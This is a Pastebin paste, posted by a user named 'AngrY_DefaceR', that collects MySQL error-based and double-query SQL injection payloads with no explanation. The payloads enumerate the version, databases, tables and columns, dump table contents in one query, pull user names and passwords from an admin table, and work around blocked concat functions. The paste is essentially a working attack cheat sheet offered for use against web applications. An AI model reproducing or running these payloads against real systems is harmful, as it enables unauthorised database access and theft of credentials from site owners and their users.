Advertisement
AngrY_DefaceR

Double query Error Base

Aug 24th, 2016
147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.68 KB | None | 0 0
  1. Show Version
  2. or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1
  3.  
  4.  
  5. Show Database
  6. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  7.  
  8.  
  9. Show tables
  10. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  11.  
  12.  
  13. Show columns
  14. and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTable limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  15.  
  16. Dump data from columns
  17. and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  18.  
  19.  
  20.  
  21.  
  22. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  23.  
  24. Error Base
  25. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  26.  
  27. Error Base Double Query
  28.  
  29. Show Version
  30. and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  31.  
  32. Show Database
  33. and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  34.  
  35. Show Table from database
  36. and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xDatabase_Name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  37.  
  38. Show Column from table
  39. and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xDatabase_name AND table_name=0xTable_name LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  40.  
  41.  
  42. Dump Data from column
  43. and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `security`.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  44. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  45.  
  46. Dump in one Shot ( Database,Table,Column )
  47. (select (@x) from (select (@x:=0x00), (select (0) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=/*!50000concat*/(@x,0x3c62723e,table_schema,0x272d2d3e27,table_name,0x272d2d3e27,column_name))))x)
  48.  
  49.  
  50. (select (@) from (select (@:=0x00), (select (@) from tbl_admin_info where (@) in (@:=/*!50000concat*/(@,user_name,0x3a,password))))a)
  51.  
  52. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  53.  
  54. if concat block use replace function
  55.  
  56. replace(REPLACE(replace(0x5b215d,0x5b,version()),0x21,database()),0x5d,usÒ€‹er())
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement